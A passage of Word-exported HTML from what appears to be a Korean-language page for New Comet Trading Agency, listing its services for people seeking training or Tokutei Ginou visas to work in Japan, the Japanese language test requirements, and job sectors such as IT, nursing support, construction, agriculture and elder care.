style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본으로 연수비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">도쿠테이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기노 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Tokutei Ginou) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자로 취업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">희망하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분들 위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">전통문화와</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">풍속을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">익히도록 필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">코스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육 시키고 취직을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> N3, N2(JLPT, JFT, NAT-Test, Top J)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격하는 분들이</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Work Visa </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인</span><o:p></o:p></li></ol><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">번역</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; • IT&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">엔지니어링</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Civil</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Mechanical</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">, EP, EC, Auto CAD&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">)</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">간호지원</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업으로 일본으로 가고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶다면</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해당</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">학당으로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp;New Comet Trading Agency</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다음</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업체를 훈련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Training Visa)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 가고 싶은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자매를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비 &nbsp; &nbsp; 스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">주선하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자동차</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수리</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">집</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">짓기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">식품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌀</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">매장</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운영</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">호텔</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비즈니스</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">의류</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">농업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">물</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">돌봄</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp;6. &nbsp;두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span 